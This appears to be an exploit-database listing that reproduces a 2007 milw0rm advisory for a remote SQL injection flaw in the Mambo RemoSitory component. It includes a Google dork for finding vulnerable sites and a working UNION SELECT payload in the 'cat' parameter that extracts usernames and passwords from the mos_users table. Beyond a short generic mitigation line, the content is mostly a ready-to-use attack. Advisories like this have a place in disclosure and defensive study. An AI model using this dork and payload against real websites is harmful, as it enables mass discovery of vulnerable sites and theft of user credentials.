header-logo
Suggest Exploit
vendor:
Component RemoSitory
by:
ajann
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Component RemoSitory
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability

The Mambo Component RemoSitory (cat) is vulnerable to a remote SQL injection attack. The vulnerability allows an attacker to execute arbitrary SQL commands on the target system.

Mitigation:

The vulnerability can be mitigated by applying a patch provided by the vendor. It is recommended to update to the latest version of the software.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.remository.com/
# $$      :  Free
# Dork    :  inurl:func=selectcat + com_remository   // Result:43.400
# DorkEx  :  http://www.google.com.tr/search?q=inurl:func%3Dselectcat+%2B+com_remository&hl=tr&start=0&sa=N

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]///index.php?option=com_remository&func=selectcat&cat=[SQL]

Example:

//index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),0,0,0%20from%20mos_users/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-08-23]